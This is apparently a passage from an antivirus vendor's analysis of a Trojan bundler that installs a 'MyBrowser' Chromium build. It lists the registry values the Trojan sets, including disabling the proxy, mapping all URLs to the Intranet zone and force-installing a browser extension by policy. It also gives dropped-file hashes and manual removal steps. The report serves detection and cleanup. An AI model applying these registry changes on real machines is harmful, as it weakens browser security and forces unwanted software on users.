"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsu5.tmp:468 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E D0 2B C3 4C 34 E4 3B 47 6E 7A 0B 21 DA 5F 66"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nssF.tmp:1668 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 19 FC E3 99 81 E2 B9 B6 A2 B0 64 AC D0 D5 26"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-som-tot-jot-cra-opw-crb-crr"

The process avg23.exe:1836 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 26 73 51 0A 2C 58 9B B3 F2 8A 35 EE 5D E2 6D"

The process %original file name%.exe:1364 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E E3 D1 B0 F8 EC 78 9B 7B 84 16 03 1D EF 10 BD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process adv_128.exe:1660 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 74 92 C1 3A 99 37 3D 39 FA 15 97 8B 06 C1 B0"

[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"

[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"

The process FlashPlayerUpdateService.exe:3536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D EE 0C 75 E4 9E D7 75 10 6E 08 57 88 09 BB 9A"

[HKLM\SOFTWARE\Macromedia\FlashPlayerSAU]
"LastUpdateCheck" = "Type: REG_QWORD, Length: 8"
"UpdateAttempts" = "0"
"CheckFrequency" = "1"

Dropped PE files

MD5 File path
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6471.exe
ea76c784fe08389a29306940372ac66ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6481.exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6548\setup.exe
2a5f246b97d00f77b78d15f72923839bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
a46fd47af97a4430b0fa9ad56eb856d4c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg23.exe
db23b6b1b300492d6e8525c80d87e447c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe
91baa8204ef1ace5371035f4adacfbd7c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf16.tmp
8574ef2796bdf5b7c82ae981831e45a5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq21.tmp
e605da91292e59124b415a5d5357c2d0c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu5.tmp
f02155fa3e59a8fc48a74a236b2bb42ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvB.tmp\inetc.dll
8217fb536a761fb752904d84de9e773fc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe
0da52b2de8e61350f5291a3da003ceeac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe
2a5f246b97d00f77b78d15f72923839bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe
ea76c784fe08389a29306940372ac66ac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe
a46fd47af97a4430b0fa9ad56eb856d4c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe
8574ef2796bdf5b7c82ae981831e45a5c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe
e6b0bc04dca07169abfc4456c4671307c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll
0bcd0698977726a660321b4fec8f4a5ec:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll
6d64fd7d8a69a39ed4ddcf0cd8d26b4bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll
72f70472e350b35290839f3e2802b4f4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll
c81e0c917d5db4fecd2ec3c7e2712bbfc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll
634ec1dc874c89711b94b5c279987d66c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe
6e98034de60d2e96b4bbb148bbeabadbc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll
17baa5fcf3b9206cc0395a7cc38be7acc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll
2b8929f7edc2df8925066cb0e7067365c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll
a25f20a5664891bc292970bd23acbf21c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll
302f011627a16ce5555e39ec53d4fbddc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll
814cb49f7706f681723ea9b5746987e4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe
90871478e7b9765cccb884751bfafc7bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll
4120c792ee30c922d95c5201cedade29c:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe
690f4b16c53bec409e4f465cfb4231a3c:\Program Files\MyBrowser\MyBrowser\Application\utility.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nsq18.tmp:1164
    6471.exe:1916
    chrome.exe:2304
    chrome.exe:2268
    chrome.exe:2216
    chrome.exe:1980
    chrome.exe:2252
    nsq21.tmp:168
    nso13.tmp:508
    6481.exe:1988
    tmp25.tmp:3448
    setup.exe:576
    setup.exe:240
    tmp24.tmp.exe:1492
    nsj1B.tmp:1648
    dwwin.exe:2404
    nsu5.tmp:468
    nssF.tmp:1668
    %original file name%.exe:1364
    FlashPlayerUpdateService.exe:3536

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\6471.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ikea.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bing.ico (1597 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].002 (3985887 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\msn.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ebay.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\netflix.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\youtube.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\etsy.ico (3913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\search.ico (1917 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\kayak.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_news.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_translate.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nba.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].001 (3985887 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].003 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].004 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ie.zip[1].005 (3985887 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\walmart.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\cnn.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\chrome.packed.7z (1304956 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\icon.json (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\twitter.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\ted.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\facebook.ico (3913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\reddit.ico (1917 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\espn.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\forbes.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bbc.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_finance.ico (2993 bytes)
    %WinDir%\Tasks\MyBrowser.job (1966 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\wikipedia.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yandex.ico (1588 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
    %WinDir%\Tasks\63266ED-96F7-4DEF-A2CE-178BD4AA43E.job (1644 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\agoda.ico (1921 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yelp.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gmail.ico (1601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\imdb.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\hotels.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\weather_channel.ico (5593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nytimes.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail_live_msn.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\theguardian.ico (1597 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\linkedin.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\expedia.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\target.ico (1909 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_mail.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\gizmodo.ico (2993 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\pinterest.ico (1592 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo_search.ico (5593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\google_plus.ico (1921 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\9gag.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\huffingtonpost.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\bestbuy.ico (3913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tripadvisor.ico (1917 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\priceline.ico (1913 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\skype.ico (1597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\amazon.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\nfl.ico (1913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\prefs (823 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\tumblr.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\yahoo.ico (1592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\setup.exe (37305 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\groupom.ico (2993 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\63266ED-96F7-4DEF-A2CE-178BD4AA43E\63266ED-96F7-4DEF-A2CE-178BD4AA43E.exe (14988 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\booking.com.ico (1601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6548\Icons\mail.ru.ico (1909 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\30.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KyoUMYnZgcIULmW (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\27.tmp (38 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons (4342 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2C.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\2D.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\LOG (161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\README (170 bytes)
